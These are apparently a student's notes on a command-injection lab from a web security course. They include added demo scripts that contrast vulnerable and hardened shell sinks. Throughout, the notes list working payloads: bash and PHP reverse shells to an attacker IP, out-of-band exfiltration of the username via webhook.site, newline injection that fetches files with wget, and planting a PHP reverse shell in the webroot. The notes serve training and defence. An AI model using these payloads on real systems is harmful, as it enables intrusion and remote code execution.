
Command Injection

Command injection - AppSecExplained (gitbook.io)

Eval is EVIL

PHP interactive mode:

php -a
$userInput = 'whoami';
system($userInput);

Never trust input, whether it comes from a user or from another system via an API: anything that ends up inside a command string is an injection point.

Avoid using Eval and System!

__________________________________________________________________________________________________________

curl -I -s -L https://tcm-sec.com | grep "HTTP/"

Can we inject whoami?

https://tcm-sec.com; whoami
Resulting command: curl -I -s -L https://tcm-sec.com; whoami | grep "HTTP/"

It runs, but nothing new shows up: the pipe binds tighter than ;, so only whoami is piped into grep, and its output contains no HTTP/. Putting another command after whoami moves the pipe off it:

https://tcm-sec.com; whoami; echo HTTP/

How do we clean up the output? Drop the link first:

; whoami; echo HTTP/

Then replace the echo with a command that does not exist, so the grep gets no input at all and prints nothing:

; whoami; asd

Output (screenshot in the original):

Other commands run the same way:

; ls -lah; asd

Ctrl+U shows the page source, where the output keeps its line breaks.
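Added example (mine, not the course's or the gitbook's): a small shell script that rebuilds the lab's sink, curl -I -s -L <url> | grep "HTTP/", behind a constructed curl stub so it runs offline. It shows why "; whoami" is swallowed by the grep while "; whoami; asd" is not, and, for the Eval is EVIL point above, what the same lookup looks like once the URL is allowlisted and passed to the shell as an argument instead of being pasted into the command string. The stub and the function names (vulnerable_lookup, quoted_lookup, safe_lookup) are assumptions for the demo, not anything from the lab.

```bash
#!/bin/sh
# Added example, not from the course or the lab. Rebuilds the sink
# `curl -I -s -L <url> | grep "HTTP/"` with a constructed curl stub.
set -u

# Constructed stand-in for curl -I: prints one status line, ignores arguments.
STUB_DIR=$(mktemp -d)
trap 'rm -rf "$STUB_DIR"' EXIT
cat > "$STUB_DIR/curl" <<'EOF'
#!/bin/sh
echo "HTTP/1.1 200 OK"
EOF
chmod +x "$STUB_DIR/curl"
export PATH="$STUB_DIR:$PATH"

# Vulnerable sink: the user value is concatenated into a command string and
# parsed by a shell, as PHP's system("curl -I -s -L $url | grep HTTP/") would.
# Because the pipe binds tighter than ";", only the last injected command is
# piped into grep; everything before it prints straight to stdout.
vulnerable_lookup() {
    sh -c "curl -I -s -L $1 | grep 'HTTP/'" 2>/dev/null
    return 0
}

# Argument passing on its own (no allowlist): the value reaches curl as one
# opaque string, so its ";" and "|" are data, not shell syntax.
quoted_lookup() {
    sh -c 'curl -I -s -L -- "$1" | grep "HTTP/"' sh "$1" 2>/dev/null
}

# Hardened sink, two independent layers:
#  1. allowlist: reject anything outside the characters a bare https URL needs
#     (this drops ; | & ` $ space and newline without enumerating them)
#  2. never let the shell parse the value: hand it over as $1, and let "--"
#     stop curl from reading it as an option
safe_lookup() {
    case "$1" in
        *[!A-Za-z0-9:/._-]*|"") echo "rejected: unexpected characters in URL" >&2; return 1 ;;
        https://*) ;;
        *) echo "rejected: not an https URL" >&2; return 1 ;;
    esac
    sh -c 'curl -I -s -L -- "$1" | grep "HTTP/"' sh "$1" 2>/dev/null
}

demo() {
    for url in 'https://tcm-sec.com' \
               'https://tcm-sec.com; whoami' \
               'https://tcm-sec.com; whoami; asd'; do
        printf '%s\n' "== payload: $url"
        printf '%s\n' '-- vulnerable:';          vulnerable_lookup "$url"
        printf '%s\n' '-- quoted only:';         quoted_lookup "$url"
        printf '%s\n' '-- allowlist + quoted:';  safe_lookup "$url" || true
    done
}
demo
```

Run it and compare the three columns for the third payload: the vulnerable sink prints the username under the status line, the quoted sink prints only the status line, and the allowlist rejects the value before any process is spawned. The allowlist is the layer to keep even when the language offers escapeshellarg or an argument array, because it also stops curl being pointed at internal hosts.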

Pop a reverse shell?

; which bash; asd

to find the path to bash, then:

; /bin/bash -i >& /dev/tcp/192.168.218.128/6969 0>&1

Nothing comes back. Two things to check before giving up: >& and /dev/tcp/ are bash features, so if the application runs commands through /bin/sh (dash on Debian-based systems) this line is a syntax error there and needs wrapping as /bin/bash -c '...'; and port 6969 on the attacker box has to be reachable from the target.

PHP?

; /usr/local/bin/php -r '$sock=fsockopen("192.168.218.128",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

Success. Commands run through the new shell:

hostname
ls -lah

__________________________________________________________________________________________________________

Blind Command Injection:

Out of band: when no output comes back in the response, make the target send it to us instead. The backticks are evaluated by the target's shell before curl runs, so the username appears in the query string of the request that webhook.site receives:

https://webhook.site/18f6cb92-c2fa-4f63-a984-6f0790c81f01?`whoami`

Newline as a separator:

A newline also ends a command for the shell, so it works when ; and | are filtered (in a URL parameter it is sent as %0a). Start a Python HTTP server as the listener, then inject a newline followed by a wget that calls back to it:

python3 -m http.server 8080
https://tcm-sec.com \n wget 192.168.218.128:8080/test
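Added example (mine, not the course's): the blind case. The sink discards all output, so the only signal is the request that reaches a listener we control. Constructed stubs stand in for curl and wget and append the URL they were asked to fetch to a log file that plays the role of webhook.site / python3 -m http.server. It also shows why a denylist of ; | & ` and $ still lets the newline payload through. The stubs, the log file and the function names are assumptions for the demo.

```bash
#!/bin/sh
# Added example, not from the course or the lab. Blind command injection
# observed out of band, with constructed stubs instead of real network.
set -u

STUB_DIR=$(mktemp -d)
OOB_LOG="$STUB_DIR/requests.log"   # stands in for the listener's access log
export OOB_LOG
trap 'rm -rf "$STUB_DIR"' EXIT

# Constructed stub used for both curl and wget: record "<tool> <url>", where
# the URL is the last argument, just as a listener would see the request.
cat > "$STUB_DIR/curl" <<'EOF'
#!/bin/sh
for a; do url=$a; done
printf '%s %s\n' "$(basename "$0")" "$url" >> "$OOB_LOG"
EOF
chmod +x "$STUB_DIR/curl"
cp "$STUB_DIR/curl" "$STUB_DIR/wget"
export PATH="$STUB_DIR:$PATH"
: > "$OOB_LOG"

# What the listener has received so far, and a reset between runs.
requests_seen()   { cat "$OOB_LOG"; }
forget_requests() { : > "$OOB_LOG"; }

# Vulnerable and blind: the value is interpolated into a shell command and
# every byte of output is dropped, so the HTTP response never reveals anything.
blind_lookup() {
    sh -c "curl -s -L $1" >/dev/null 2>&1
    return 0
}

# Same sink behind a typical character denylist. grep works per line, and so
# does a preg_match over the same class: a newline is not one of the
# "special characters", so the second command after it is never noticed.
filtered_blind_lookup() {
    if printf '%s' "$1" | grep -q '[;|&`$]'; then
        return 1                        # "special characters are filtered"
    fi
    blind_lookup "$1"
}

demo() {
    echo '== out of band: the username travels inside the URL the listener receives'
    blind_lookup 'https://webhook.site/18f6cb92-c2fa-4f63-a984-6f0790c81f01?`whoami`'
    requests_seen
    forget_requests

    echo '== the denylist stops ";" ...'
    filtered_blind_lookup 'https://tcm-sec.com; wget 192.168.218.128:8080/test' || echo 'rejected by filter'
    echo '== ... but a newline is still a command separator'
    filtered_blind_lookup "$(printf 'https://tcm-sec.com\nwget 192.168.218.128:8080/test')"
    requests_seen
}
demo
```

The log is the only place the injected command leaves a trace, which is why the real-world check is a request to a host you control (webhook.site, a Python http.server, or a DNS name you can watch), not the page's response. The denylist half is the reason the course moves from ; to a newline: a filter written as a list of bad characters has to be complete to be worth anything, and an allowlist of permitted characters is the easier thing to get right.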

Can we get a shell?

https://tcm-sec.com \n ssh 192.168.218.128:8080/test

When special characters are filtered, another option is to drop a file on the target and get the web server to run it:

cd /tmp
cp /usr/share/webshells/laudanum/php/php-reverse-shell.php .
mv php-reverse-shell.php rev.php

Edit rev.php so $ip and $port match the Kali IP and the port the shell should call back to, and have a listener on that port (nc -lvnp PORT) running before the file is opened in the browser.

In new terminal:

cd /tmp
python3 -m http.server 8080 #run server to get the file

on the website:

https://tcm-sec.com \n wget 192.168.218.128:8080/rev.php

In Firefox, browse to wherever the file landed (wget writes into the web process's working directory, so the path depends on the app):

localhost/rev.php
OR
localhost/labs/rev.php

If the file does not land in the webroot, chain with && and have curl write it straight there:

https://tcm-sec.com && curl 192.168.218.128:8080/rev.php > /var/www/html/rev.php

Also, a variant posted on the course Discord (quoted as written):

Hey @strider_gearhead and @imhasin - I was able to get the command injection 0x02 to work. Admittedly it's a wee bit hacky but this is how I did it -
1. Modify the reverse shell as required (like host and port) and host it using Python or another method (I used port 9090 to do so with updog)
2. Start another listener on port 443 to act as the "out of band" server
3. Use the following URL in the lab page to trigger the shell -
http://172.17.0.1:443?'curl 172.17.0.1:9090/shell.php | php' - You should be using back ticks rather than single quotes but Discord Markdown didn't like it. @July 23, 2023 10:25 AM (EDT)

http://192.168.218.128:443?`curl 172.17.0.1:9090/shell.php | php`